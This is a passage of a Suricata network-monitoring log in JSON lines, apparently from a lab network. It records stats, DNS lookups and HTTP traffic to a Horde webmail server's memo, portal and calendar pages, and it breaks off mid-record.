{"timestamp":"2020-02-29T00:09:56.000232+0000","event_type":"stats","stats":{"uptime":14248,"capture":{"kernel_packets":134300,"kernel_drops":0},"decoder":{"pkts":134303,"bytes":92744834,"invalid":185,"ipv4":132828,"ipv6":8,"ethernet":134303,"raw":0,"null":0,"sll":0,"tcp":127636,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2336,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17853,"memcap_state":0,"memcap_global":0},"http":{"memuse":122345,"memcap":0}}} {"timestamp":"2020-02-29T00:09:57.718624+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34782,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:09:58.000585+0000","flow_id":2027510894811779,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:57.449155+0000","end":"2020-02-29T00:04:57.553288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:00.000926+0000","flow_id":2220367811436415,"event_type":"flow","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:59.384895+0000","end":"2020-02-29T00:04:59.493660+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:03.000233+0000","event_type":"stats","stats":{"uptime":14255,"capture":{"kernel_packets":134305,"kernel_drops":0},"decoder":{"pkts":134306,"bytes":92745032,"invalid":185,"ipv4":132831,"ipv6":8,"ethernet":134306,"raw":0,"null":0,"sll":0,"tcp":127639,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2338,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse":70626,"memcap":0}}} {"timestamp":"2020-02-29T00:10:04.262384+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35647,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:04.370921+0000","flow_id":1338237383344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52542,"proto":"UDP","dns":{"type":"answer","id":35647,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:10:04.390563+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:10:05.000419+0000","flow_id":607994139066563,"event_type":"flow","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:03.934083+0000","end":"2020-02-29T00:05:04.042931+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:06.002843+0000","flow_id":473067756685678,"event_type":"flow","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":22,"bytes_toserver":3149,"bytes_toclient":20072,"start":"2020-02-29T00:08:55.297326+0000","end":"2020-02-29T00:09:05.483858+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:07.000736+0000","flow_id":1380207798145143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1182,"bytes_toclient":709,"start":"2020-02-29T00:08:38.282743+0000","end":"2020-02-29T00:09:06.456416+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:07.026085+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:07.034032+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38273,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:07.142311+0000","flow_id":691737431344368,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45470,"proto":"UDP","dns":{"type":"answer","id":38273,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:07.185699+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} {"timestamp":"2020-02-29T00:10:07.203534+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14810,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:07.311742+0000","flow_id":23809887247118,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58586,"proto":"UDP","dns":{"type":"answer","id":14810,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:07.439849+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933}} {"timestamp":"2020-02-29T00:10:08.000384+0000","flow_id":871962829359369,"event_type":"flow","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:07.362761+0000","end":"2020-02-29T00:05:07.471041+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:10.000161+0000","event_type":"stats","stats":{"uptime":14262,"capture":{"kernel_packets":134318,"kernel_drops":0},"decoder":{"pkts":134333,"bytes":92755292,"invalid":185,"ipv4":132858,"ipv6":8,"ethernet":134333,"raw":0,"null":0,"sll":0,"tcp":127660,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2718,"new_pruned":15,"est_pruned":2340,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":122290,"memcap":0}}} {"timestamp":"2020-02-29T00:10:12.000172+0000","flow_id":1278752082539280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1233,"bytes_toclient":7100,"start":"2020-02-29T00:09:06.439056+0000","end":"2020-02-29T00:09:11.765350+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:12.397307+0000","flow_id":922471664245492,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34784,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4933},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":20631,"tx_id":2}} {"timestamp":"2020-02-29T00:10:14.000441+0000","flow_id":212195723528106,"event_type":"flow","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:13.280490+0000","end":"2020-02-29T00:05:13.388520+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:16.000681+0000","flow_id":127932775662908,"event_type":"flow","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1233,"bytes_toclient":1174,"start":"2020-02-29T00:09:10.329020+0000","end":"2020-02-29T00:09:15.522203+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:16.614511+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30292,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:16.722829+0000","flow_id":1917516803235951,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34781,"proto":"UDP","dns":{"type":"answer","id":30292,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:16.870668+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981}} {"timestamp":"2020-02-29T00:10:17.000180+0000","event_type":"stats","stats":{"uptime":14269,"capture":{"kernel_packets":134333,"kernel_drops":0},"decoder":{"pkts":134338,"bytes":92755574,"invalid":185,"ipv4":132861,"ipv6":8,"ethernet":134338,"raw":0,"null":0,"sll":0,"tcp":127663,"udp":4998,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2735,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2751,"synack":2742,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1776,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2281,"failed_udp":110},"tx":{"http":4577,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2360}},"flow_mgr":{"closed_pruned":2719,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17855,"memcap_state":0,"memcap_global":0},"http":{"memuse":87374,"memcap":0}}} {"timestamp":"2020-02-29T00:10:18.000391+0000","flow_id":2001607963729589,"event_type":"flow","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4177,"start":"2020-02-29T00:09:12.614069+0000","end":"2020-02-29T00:09:17.822939+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:21.748959+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6981},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37763,"tx_id":0}} {"timestamp":"2020-02-29T00:10:21.758965+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12570,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:21.866749+0000","flow_id":854757210952885,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41533,"proto":"UDP","dns":{"type":"answer","id":12570,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.444617+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342}} {"timestamp":"2020-02-29T00:10:22.621298+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24342},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:22.629755+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33644,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:22.738168+0000","flow_id":1577625976740859,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44212,"proto":"UDP","dns":{"type":"answer","id":33644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:10:22.795647+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 